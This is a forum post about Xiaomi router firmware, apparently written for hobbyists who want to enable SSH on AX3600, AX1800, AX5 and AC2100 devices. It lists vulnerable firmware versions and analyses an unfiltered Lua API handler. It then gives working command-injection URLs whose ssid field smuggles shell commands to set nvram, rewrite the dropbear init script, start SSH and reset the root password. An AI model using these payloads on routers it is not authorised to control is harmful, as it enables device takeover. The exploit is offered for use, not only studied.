游客您好
免注册登录

[固件下载] AX3600/AX1800/AX5/AC2100官方固件开启SSH方法

5
回复
9721
查看
[复制链接]
发表于 2021-1-7 11:38 | 显示全部楼层 |阅读模式
这段时间一直抽时间在分析固件,昨天终于找到漏洞,web注入方式,不过该漏洞在最新版本应该已经堵上了
详细方法及固件版本晚点整理公布
root密码算法同之前

0624:AX3600第三方QSDK固件终于出来,辛苦@li4621180,喜欢折腾的可以一试,小米AX3600,第三方QSDK固件,不过目前根据大家反馈刷机方法貌似还不完善,待更新,有问题可以进群讨论便捷一点,群号1106916203,留群号如有不妥请通知本人,我会做删除处理,主要是为了方便快捷交流
0609:AX3600的dts、分区备份及kernel_log,希望有能力的大神研究一下适配https://www.right.com.cn/forum/forum.php?mod=viewthread&tid=4034554
0605:据说坛友@efsg说有大佬已经粗略分析了原厂固件,理论上没有校验,所以可尝试适配固件(真刷坏了也可以保修,你懂的) 希望动手能力比较强愿意折腾的同学可以(拆机)TTL提供完整的启动日志和内核日志,有望可以做出QSDK固件


0526:方法公布
----
有漏洞固件,AX3600 1.0.17版本/AX1800 1.0.34/1.0.328/1.0.336版本/AX5 1.0.16/1.0.26/AC2100 2.0.722版本;AX3600的1.0.20和1.0.50版本应该已经修复了,这两个固件获取SSH的方法看@高渐离大神的帖子哈,最新1.066/1.067的固件均有保留SSH方法

下载地址
AX3600
  • http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r3600/miwifi_r3600_firmware_5da25_1.0.17.bin

[color=rgb(51, 102, 153) !important]复制代码

0604震惊!经由坛友@zhanshrd 验证,AX1800 1.0.34版本固件竟然同样也可用以下方法开启SSH,1.0.328的固件仍然适用,最新的1.0.336仍然有效
AX1800
  • http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rm1800/miwifi_rm1800_firmware_6718d_1.0.34.bin

[color=rgb(51, 102, 153) !important]复制代码

  • http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rm1800/miwifi_rm1800_all_65ab2_1.0.328.bin

[color=rgb(51, 102, 153) !important]复制代码

  • http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/rm1800/miwifi_rm1800_firmware_fafda_1.0.336.bin

[color=rgb(51, 102, 153) !important]复制代码


0618:坛友@cxp863反馈,1071楼,同样适用于红米AX5,出厂固件1.0.16版本
0619:增加AX5固件下载地址
0714:AX5最新MESH固件仍有效
AX5
  • http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/ra67/miwifi_ra67_all_f3fac_1.0.26.bin

[color=rgb(51, 102, 153) !important]复制代码

  • http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/ra67/miwifi_ra67_firmware_63805_1.0.16.bin

[color=rgb(51, 102, 153) !important]复制代码

0825:最近比较忙,抽空粗略看了一下,AC2100的新固件2.0.722也带入了这个漏洞,AX6的1.0.18固件无此漏洞

AC2100
  • http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r2100/miwifi_r2100_firmware_4b519_2.0.722.bin

[color=rgb(51, 102, 153) !important]复制代码




降级到对应版本,进行初步设置,可以先关掉自动升级或不接外网防止自动升级到最新版本

讲一下漏洞利用
管理密码登录管理页面后
  • http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/web/home#router

[color=rgb(51, 102, 153) !important]复制代码


0606:和小白解释下吧,<STOK>是代表你登录后自动生成的那一长串数据,自己替换下......
注入地址及示例,其它的大家发挥吧,下面这句只是改nvram设置ssl_en=1的,只要执行一步到位代码,集成进去了
  • http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

[color=rgb(51, 102, 153) !important]复制代码


返回{"code":0}即代表成功,其实成不成功都会返回这个:)
注意传参顺序及指令前后都要加一个分号,即%3B,ssid=-h是必须的,否则需要等1-2分钟才能注入成功,虽然返回很快

按理只要利用漏洞注入命令注释掉或删掉/etc/init.d/dropbear中如下判断代码(135-137行),重启即可开启SSH,root密码请自行根据SN计算;不想计算的或不知道怎么计算的,可以看7楼的方法
  •         # 稳定版不能打开ssh服务
  •         flg_ssh=`nvram get ssh_en`
  •         channel=`/sbin/uci get /usr/share/xiaoqiang/xiaoqiang_version.version.CHANNEL`
  •         if [ "$flg_ssh" != "1" -o "$channel" = "release" ]; then
  •                 return 0
  •         fi


[color=rgb(51, 102, 153) !important]复制代码

0601一步到位代码,根据其他大侠修正简化
  • http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

[color=rgb(51, 102, 153) !important]复制代码

0619:把7楼改密码的也放在这吧,很多人不注意看帖子,root账号不想用初始密码的执行下面的代码改密码为admin
  • http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

[color=rgb(51, 102, 153) !important]复制代码



代码为网友赞助我拼凑的。。哈哈。@fredliang44 @xjboss @高渐离@pnq

0528:漏洞原理
解包固件看里面的lua脚本,17版本的固件lua脚本不知为啥没有加密(或许是故意的,哈哈)
有漏洞的这个api应该是针对AX3600新加的,api/misystem/set_config_iotdev调用的函数如下
  • function setConfigIotDev()
  •     local XQFunction = require("xiaoqiang.common.XQFunction")
  •     local LuciUtil = require("luci.util")
  •     local result = {
  •         ["code"] = 0
  •     }
  •     local ssid = LuciHttp.formvalue("ssid")----参数直接代入,未过滤
  •     local bssid = LuciHttp.formvalue("bssid")----参数直接代入,未过滤
  •     local uid = LuciHttp.formvalue("user_id")----参数直接代入,未过滤
  •     XQLog.log(debug_level, "ssid = "..ssid)
  •     XQLog.log(debug_level, "bssid = "..bssid)
  •     XQLog.log(debug_level, "uid = "..uid)
  •     if XQFunction.isStrNil(ssid)
  •         or XQFunction.isStrNil(bssid)
  •         or XQFunction.isStrNil(uid) then
  •         result.code = 1523
  •     end
  •     if result.code ~= 0 then
  •         result["msg"] = XQErrorUtil.getErrorMessage(result.code)
  •     else
  •         XQFunction.forkExec("connect -s "..ssid.." -b "..bssid.. " -u "..uid)----参数直接代入,未过滤
  •     end
  •     LuciHttp.write_json(result)
  • end

[color=rgb(51, 102, 153) !important]复制代码


大家折腾起来吧

0

主题

368

帖子

808

积分

中级砖家

Rank: 6Rank: 6

发表于 2021-1-14 09:59 | 显示全部楼层
初来乍到,请多多关照。。。
回复 支持 反对

使用道具 举报

0

主题

329

帖子

720

积分

中级砖家

Rank: 6Rank: 6

发表于 2021-2-6 11:10 | 显示全部楼层
支持一下吧~
回复 支持 反对

使用道具 举报

0

主题

331

帖子

734

积分

中级砖家

Rank: 6Rank: 6

发表于 2021-2-6 11:10 | 显示全部楼层
学习下
回复 支持 反对

使用道具 举报

0

主题

335

帖子

730

积分

中级砖家

Rank: 6Rank: 6

发表于 2021-2-6 11:10 | 显示全部楼层
占坑编辑ing
回复 支持 反对

使用道具 举报

0

主题

363

帖子

844

积分

中级砖家

Rank: 6Rank: 6

三星粉
发表于 2021-2-6 11:10 | 显示全部楼层
厉害!强~~~~没的说了!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

电视直播

智能电视家庭网是一个提供热门电视软件下载安装,电视台频道信息整理,智能电视机顶盒评测,热门剧集推荐的综合泛电视资讯平台。 智能电视家庭网部分内容从搜索引擎搜索整理获得,版权归原创者所有,如果侵犯了您的权益,我们会及时删除侵权内容。
Powered by Discuz!X3.4 ©2001-2013 Comsenz Inc.